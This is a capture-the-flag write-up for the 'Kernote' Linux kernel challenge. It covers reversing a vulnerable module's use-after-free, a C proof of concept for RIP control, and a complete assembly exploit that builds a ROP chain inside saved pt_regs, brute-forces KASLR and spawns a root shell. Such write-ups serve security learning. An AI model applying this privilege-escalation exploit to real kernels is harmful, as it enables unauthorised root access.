Kernote
Authors: Nspace
Tags: pwn, kernel
Points: 750
Let’s try kernote in kernel
nc 42.192.68.11 12345 Attachment or Attachment(MEGA)
Analysis
This is a kernel pwn challenge. The challenge uses the usual setup: a QEMU VM running Linux with a vulnerable module. We get an unprivileged shell in the VM and we have to exploit the kernel to become root and read the flag.
$ ls
bzImage readme.md rootfs.img run.sh
$ cat readme.md
Here are some kernel config options in case you need it
CONFIG_SLAB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
$ cat run.sh
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-kernel ./bzImage \
-hda ./rootfs.img \
-append "console=ttyS0 quiet root=/dev/sda rw init=/init oops=panic panic=1 panic_on_warn=1 kaslr pti=on" \
-monitor /dev/null \
-smp cores=2,threads=2 \
-nographic \
-cpu kvm64,+smep,+smap \
-no-reboot \
-snapshot
All the usual mitigations are enabled (SMEP, SMAP, KASLR, KPTI, …). The kernel also uses the SLAB allocator instead of the default SLUB and disables usermode helpers by hardcoding their path to “”. Furthermore the VM will shut down immediately if we cause any kernel warnings or panics.
rootfs.img
is an ext4 disk. We can mount it to extract the files:
$ mount -o loop rootfs.img mount
$ ls mount
bin dev etc flag init kernote.ko linuxrc lost+found proc sbin sys tmp usr
$ cat mount/init
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs tmpfs /tmp
#mount -t devtmpfs devtmpfs /dev
mkdir /dev/pts
mount -t devpts devpts /dev/pts
echo /sbin/mdev>/proc/sys/kernel/hotplug
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 1 > /proc/sys/kernel/kptr_restrict
echo "flag{testflag}">/flag
chmod 660 /flag
insmod /kernote.ko
#/sbin/mdev -s
chmod 666 /dev/kernote
chmod 777 /tmp
setsid cttyhack setuidgid 1000 sh
poweroff -f
kptr_restrict=1
prevents us from reading kernel addresses from
/proc/kallsyms
and dmesg_restrict=1
prevents us from reading the kernel logs.
The interesting part is kernote.ko
, the kernel module which contains the
vulnerable code. My teammate busdma reverse
engineered the module and quickly spotted some bugs. Here is the (cleaned up)
decompilation.
uint64_t *buf[16];
uint64_t *note;
int major_num;
struct class *module_class;
struct device *module_device;
spinlock_t spin;
int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg);
const struct file_operations kernote_fo = {
.unlocked_ioctl = kernote_ioctl,
};
int module_init(void)
{
major_num = register_chrdev(0LL, "kernote", &kernote_fo);
if (major_num < 0) {
printk(KERN_INFO "[kernote] : Failed to register device\n");
return major_num;
}
module_class = class_create(THIS_MODULE, "kernote", &module_device);
if (IS_ERR(module_class)) {
unregister_chrdev(major_num, "kernote");
printk(KERN_INFO "[kernote] : Failed to create class\n");
return PTR_ERR(module_class);
}
module_device = device_create(module_class, NULL, MKDEV(major_num, 0), NULL, "kernote");
if (IS_ERR(module_device)) {
class_destroy(module_class);
unregister_chrdev(major_num, "kernote");
printk(KERN_INFO "[kernote] : Failed to create device\n");
return PTR_ERR(module_device);
}
printk(KERN_INFO "[kernote] : Insert module complete\n");
return 0;
}
int kernote_ioctl(struct file *f, uint32_t cmd, uint64_t arg)
{
int ret;
raw_spin_lock(&spin);
switch (cmd) {
// alloc note
case 0x6667:
if (arg > 15) {
ret = -1;
break;
}
uint64_t *newnote = kmalloc(32, GFP_KERNEL);
buf[arg] = newnote;
if (newnote == NULL) {
ret == -1;
break;
}
ret = 0;
break;
// free note
case 0x6668:
if (arg > 15 || buf[arg] == NULL) {
ret = -1;
break;
}
kfree(buf[arg]);
buf[arg] = 0;
ret = 0;
break;
// set note pointer
case 0x6666:
if (arg > 15) {
ret = -1;
break;
}
note = buf[arg];
break;
// write note
case 0x6669:
if (note) {
*note = arg;
ret = 0;
} else {
ret = -1;
}
break;
// inc refcount?
case 0x666a:
struct user_struct *user = current_task->cred->user;
refcount_inc(&user->__count);
if (user->uid != 0) {
printk(KERN_INFO "[kernote] : ********\n");
ret = -1;
} else if (note != NULL) {
printk(KERN_INFO "[kernote] : 0x%lx\n", *note);
ret = 0;
} else {
printk(KERN_INFO "[kernote] : No note\n");
ret = -1;
}
break;
}
spin_unlock(&spin);
return ret;
}
The first bug is that note can point to freed memory if we set it to the address
of a note and then free that note. The second bug is that command 0x666a
increments the user_struct
’s refcount but never decrements it. The second bug
is useless because overflowing a refcount triggers a warning which shuts down
the VM immediately, but the first bug looks promising. Later during the CTF the
author of the task confirmed that the second bug was unintentional.
Command 0x666a
looks like it might leak the contents of a note, but in
practice it only does so when invoked by root and it logs the contents to dmesg,
which we can’t access. Either way it’s not useful.
In conclusion, the bug lets us overwrite the first 8 bytes of a freed chunk in kmalloc-32. The challenge is to somehow use that to get root.
Exploitation
After reverse engineering the module busdma also wrote a PoC exploit that crashes
the kernel with a controlled RIP. The PoC frees a note and reclaims the freed
chunk with a struct seq_operations
, which is heap allocated in kmalloc-32 and contains a function pointer
in the first 8 bytes. It then uses the bug to overwrite the function pointer and
reads from the seq file to call the overwritten pointer.
#define SET_NOTE 0x6666
#define ALLOC_ENTRY 0x6667
#define FREE_ENTRY 0x6668
#define WRITE_NOTE 0x6669
static int kfd;
static int set_note(uint64_t idx)
{
return ioctl(kfd, SET_NOTE, idx);
}
static int alloc_entry(uint64_t idx)
{
return ioctl(kfd, ALLOC_ENTRY, idx);
}
static int free_entry(uint64_t idx)
{
return ioctl(kfd, FREE_ENTRY, idx);
}
static int write_note(uint64_t val)
{
return ioctl(kfd, WRITE_NOTE, val);
}
int main(void)
{
kfd = open("/dev/kernote", O_RDWR);
assert(kfd > 0);
for (int i = 0; i < 0x100; i++) {
alloc_entry(0);
}
alloc_entry(1);
set_note(1);
free_entry(1);
int fd = open("/proc/self/stat", O_RDONLY);
write_note(0x4141414141414141);
char buf[32] = {};
read(fd, buf, sizeof(buf));
return 0;
}
[ 3.856543] general protection fault, probably for non-canonical address 0x4141414141414141: 0000 [#1] SMP PTI
[ 3.858362] CPU: 0 PID: 141 Comm: pwn Tainted: G OE 5.11.9 #2
[ 3.859598] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[ 3.861074] RIP: 0010:__x86_indirect_thunk_rax+0x3/0x5
[ 3.861995] Code: 06 d7 ff 31 c0 e9 43 06 d7 ff <...>
[ 3.865260] RSP: 0018:ffffc90000253dc0 EFLAGS: 00010246
[ 3.866187] RAX: 4141414141414141 RBX: ffffc90000253e60 RCX: 0000000000000000
[ 3.867440] RDX: 0000000000000000 RSI: ffff888004d47be0 RDI: ffff888004d47bb8
[ 3.868698] RBP: ffffc90000253e18 R08: 0000000000001000 R09: ffff888003c63000
[ 3.869960] R10: ffffc90000253e68 R11: 0000000000000000 R12: 0000000000000000
[ 3.871217] R13: ffff888004d47bb8 R14: ffff888004d47be0 R15: ffffc90000253ef0
[ 3.872474] FS: 0000000001e68380(0000) GS:ffff888007600000(0000) knlGS:0000000000000000
[ 3.873898] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 3.874914] CR2: 000000000048afd0 CR3: 0000000004cca000 CR4: 00000000003006f0
This is a great starting point but it’s not enough to own the kernel. We can’t directly jump to some code in userspace because of SMEP + KPTI. We also can’t (seemingly) start a ROP or JOP chain right away because we don’t control the contents of any of the registers or the memory they point to (except rax which contains our overwritten function pointer).
My goal at this point was to try and use our bug to get arbitrary read and write in the kernel.
My first idea was to overwrite a freelist pointer. By default the first 8 bytes of a free kmalloc chunk contain the freelist pointer and we can easily get arbitrary r/w by overwriting that. Unfortunately this challenge doesn’t use the default allocator. Instead the author enabled the older SLAB allocator which stores metadata out-of-line and prevents this attack.
My second idea was to corrupt the next pointer of a msg_msgseg
. I had played
corCTF about 1 month earlier and spent a lot of time failing to pwn the Fire of
Salvation
kernel challenge. That challenge let us overwrite the first 40 bytes
of a freed chunk in kmalloc-4k, which is somewhat similar to what we have here.
You can find the author’s writeup for that challenge here.
We can reclaim the freed note with a 32-byte msg_msgseg
, which contains a
pointer to the next msgseg
in the first 8 bytes, then hopefully use that to
get arbitrary read and write, just like in that challenge. Unfortunately I
couldn’t turn this into an arbitrary kernel r/w, even though I could crash the
kernel with an arbitrary pointer dereference. The reason is that the bug doesn’t
let us overwrite the m_ts
field of msg_msg
, so the kernel will stop reading
and writing after the first msg_msgseg
.
After spending hours on this idea and ultimately ruling it out I went back to busdma’s crash PoC and started looking for controllable memory in GDB. I eventually noticed that there were a lot of what looked like userspace pointers near the bottom of the kernel’s stack:
After looking at the system call handler for a bit it became clear that these
are the saved userspace registers. One of the first things the system call
handler does is to push a struct pt_regs
on the stack.
pt_regs
contains the values of all the registers at the moment the system call was
invoked. As far as I can tell all registers are saved on every syscall,
despite what the comment on pt_regs
says. Obviously the contents of pt_regs
are fully controlled by userspace, minus some constraints such as that rax
must contain the correct system call number.
struct pt_regs {
unsigned long r15;
unsigned long r14;
unsigned long r13;
unsigned long r12;
unsigned long rbp;
unsigned long rbx;
unsigned long r11;
unsigned long r10;
unsigned long r9;
unsigned long r8;
unsigned long rax;
unsigned long rcx;
unsigned long rdx;
unsigned long rsi;
unsigned long rdi;
unsigned long orig_rax;
unsigned long rip;
unsigned long cs;
unsigned long eflags;
unsigned long rsp;
unsigned long ss;
};
At this point I had an idea: what if we could store a ROP chain in the contents
of pt_regs
? r8
-r15
, rbx
, and rbp
are ignored by the read
syscall and
can contain any value (except r11
which contains the saved rflags
). This
gives us about 80 bytes of contiguous controlled memory. Is this enough to fit
a ROP chain that gives us root and returns to userspace without crashing? Can
we even move the stack pointer to the beginning of the controlled area in a
single gadget?
As luck would have it, the answer to the second question is yes! I found this
gadget that moves the stack pointer by just the right amount when invoked from
the overwritten seq_operations
pointer:
0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
But still, 80 bytes is really not a lot. Can we fit our ROP chain in so little
space? A typical payload used to get root in kernel exploits calls
commit_creds(prepare_kernel_cred(NULL))
. Doing this uses 32 bytes in our ROP
chain. However in addition to this we have to return to userspace cleanly, or
we will crash the VM before we can use our newly-acquired root credentials.
Returning to userspace takes an additional 40 bytes because we need to set rcx
to a valid userspace address and r11
to valid flags before we can ROP to
syscall_return_via_sysret
. This comes in at 72 bytes, just below of our 80
byte budget. We can further optimize this down to 64 bytes if we do
commit_creds(&init_cred)
instead, and skip prepare_kernel_cred
. init_cred
is the cred
structure used for the init process and it’s located in the
kernel’s data section. Our final ROP chain then looks like this:
r15: 0xffffffff81075c4c: pop rdi; ret
r14: 0xffffffff8266b780: &init_cred
r13: 0xffffffff810c9dd5: commit_creds
r12: 0xffffffff810761da: pop rcx; ret
rbp: < address of our code in userspace >
rbx: 0xffffffff8107605a: pop r11; ret
r11: < valid rflags value >
r10: 0xffffffff81c00109: return from syscall
We need precise control over the values stored in the registers when we invoke
the syscall handler. We need to recover our userspace stack after returning.
This is probably possible in C but I figured I should write a helper function
in assembly instead, to have more precise control over the registers. The
syscall
instruction already stores the current value of rflags
in r11
so
we don’t have to set that register.
pwn:
mov [user_rsp], rsp
mov r15, 0xffffffff81075c4c
mov r14, 0xffffffff8266b780
mov r13, 0xffffffff810c9dd5
mov r12, 0xffffffff810761da
lea rbp, [.after_syscall]
mov rbx, 0xffffffff8107605a
mov r10, 0xffffffff81c00109
; SYS_read
xor eax, eax
syscall
.after_syscall:
mov rsp, [user_rsp]
ret
user_rsp: dq 0
Combined with the seq_operations
exploit this makes us root, and we can simply
read and print the flag or execve
a shell after returning to userspace.
There is still an elephant in the room though. So far we have assumed that we know the address of all of these gadgets, and yet we still have absolutely no leaks of kernel addresses or a way to bypass KASLR.
Luckily for us even with KASLR the base address of the kernel is not very random.
In fact there are only 512 possible addresses at which the kernel will load
itself. This is small enough that we can brute force it in a reasonable amount
of time. We will keep trying our exploit assuming that the kernel’s base address
is 0xffffffff81000000
(same as if there was no KASLR) and eventually we will
succeed. We are nearly guaranteed to succeed at least once if we run the exploit
~2000 times. In our experiments running the exploit against the remote system
took about 5-10 seconds. We did some napkin math and concluded that we should
be able to get the flag in about an hour or two by running multiple instances
of the exploit in parallel. Since we still had several hours left before the
end of the CTF we decided to go with that. We got the flag after about an hour.
I ended up writing an optimized version of the exploit entirely in assembly to make it smaller and speed up the brute forcing. The target VM has no internet access so we have to upload the exploit through the VM’s serial port which takes a long time. Even when using UPX and musl, the C exploit was about 18KB. The exploit written in assembly is only 342 bytes when gzipped, so it uploads much faster.
; Keep running this exploit until it works, which should take about 512 tries.
; Or alternatively find a KASLR bypass :)
; Emit 64-bit code.
bits 64
; Use RIP-relative addressing by default.
default rel
; Load at this address
org 0x40000000
ELFCLASS64 equ 2
ELFDATA2LSB equ 1
EV_CURRENT equ 1
ELFOSABI_NONE equ 0
ET_EXEC equ 2
EM_X86_64 equ 62
PT_LOAD equ 1
PF_X equ 1
PF_W equ 2
PF_R equ 4
O_RDONLY equ 0
O_RDWR equ 2
; 64-bit ELF header.
elfh:
; e_ident
db 0x7f, 'ELF', ELFCLASS64, ELFDATA2LSB, EV_CURRENT, ELFOSABI_NONE, 0, 0, 0, 0, 0, 0, 0, 0
; e_type
dw ET_EXEC
; e_machine
dw EM_X86_64
; e_version
dd EV_CURRENT
; e_entry
dq _start
; e_phoff
dq phdr - $$
; e_shoff
dq 0
; e_flags
dd 0
; e_ehsize
dw ehsize
; e_phentsize
dw phsize
; e_phnum
dw 1
; e_shentsize
dw 0
; e_shnum
dw 0
; e_shstrndx
dw 0
; Size of the elf header.
ehsize equ $ - elfh
; 64-bit program header.
phdr:
; p_type;
dd PT_LOAD
; p_flags;
dd PF_R | PF_W | PF_X
; p_offset;
dq 0
; p_vaddr;
dq $$
; p_paddr;
dq $$
; p_filesz;
dq filesize
; p_memsz;
dq filesize
; p_align;
dq 0x1000
phsize equ $ - phdr
exit:
mov eax, 60
syscall
ud2
open:
mov eax, 2
syscall
ret
ioctl:
mov eax, 16
syscall
ret
execve:
mov eax, 59
syscall
ud2
set_note:
mov edx, edi
mov edi, [kfd]
mov esi, 0x6666
jmp ioctl
alloc_entry:
mov edx, edi
mov edi, [kfd]
mov esi, 0x6667
jmp ioctl
free_entry:
mov edx, edi
mov edi, [kfd]
mov esi, 0x6668
jmp ioctl
write_note:
mov rdx, rdi
mov edi, [kfd]
mov esi, 0x6669
jmp ioctl
pwn:
mov [user_rsp], rsp
; 0xffffffff81075c4c: pop rdi; ret
mov r15, 0xffffffff81075c4c
; 0xffffffff8266b780: init_cred
mov r14, 0xffffffff8266b780
; 0xffffffff810c9dd5: commit_creds
mov r13, 0xffffffff810c9dd5
; 0xffffffff810761da: pop rcx; ret
mov r12, 0xffffffff810761da
lea rbp, [.after_syscall]
; 0xffffffff8107605a: pop r11; ret
mov rbx, 0xffffffff8107605a
; 0xffffffff81c00109: return from syscall
mov r10, 0xffffffff81c00109
xor eax, eax
syscall
.after_syscall:
mov rsp, [user_rsp]
ret
_start:
; kfd = open("/dev/kernote", O_RDWR)
lea rdi, [devpath]
mov esi, O_RDWR
call open
mov [kfd], eax
; for (int i = 0; i < 0x100; i++) {
; alloc_entry(0);
; }
mov r8d, 0x100
.sprayloop:
xor edi, edi
call alloc_entry
dec r8d
jnz .sprayloop
; alloc_entry(1)
mov edi, 1
call alloc_entry
; set_note(1)
mov edi, 1
call set_note
; free_entry(1)
mov edi, 1
call free_entry
; statfd = open("/proc/self/stat", O_RDONLY)
lea rdi, [statpath]
mov esi, O_RDONLY
call open
mov [statfd], eax
; 0xffffffff81516ebe: add rsp, 0x180; mov eax, r12d; pop rbx; pop r12; pop rbp; ret;
; write_note(0xffffffff81516ebe)
mov rdi, 0xffffffff81516ebe
call write_note
; pwn(statfd, buf, sizeof(buf))
mov edi, [statfd]
lea rsi, [buf]
mov edx, bufsize
call pwn
; execve("/bin/sh", {"/bin/sh", NULL}, NULL)
lea rdi, [shell_path]
lea rsi, [shell_argv]
xor edx, edx
jmp execve
user_rsp: dq 0
kfd: dd 0
statfd: dd 0
shell_argv: dq shell_path, 0
buf: times 32 db 0
bufsize equ $ - buf
devpath: db '/dev/kernote', 0
statpath: db '/proc/self/stat', 0
shell_path: db '/bin/sh', 0
filesize equ $ - $$
flag{LMm2tayzwWEzGpnmoyyf8zoTmk6X5TQrL45o}
Intended solution
It is pretty clear that this solution is not what the author intended, but
it was still fun and it got us a flag which is what counts. The intended
solution was to overwrite a freed ldt_struct
. You can find the author’s own
writeup here.
Conclusion
Thanks to busdma for the help with reversing and the initial PoC exploit and to my teammates for letting me bounce ideas off of them. Thanks to 0ops and eee for the amazing CTF, we really had a lot of fun playing this one. Looking forward to next year’s edition :).
I don’t know if using pt_regs
as ROP chain is a new technique or not. I’ve
never heard of it before and I couldn’t find anything on Google. It seems pretty
powerful though: it only requires RIP control and bypasses all mitigations
except KASLR, assuming that the kernel has the right gadgets. Let me know if
it’s been used before somewhere.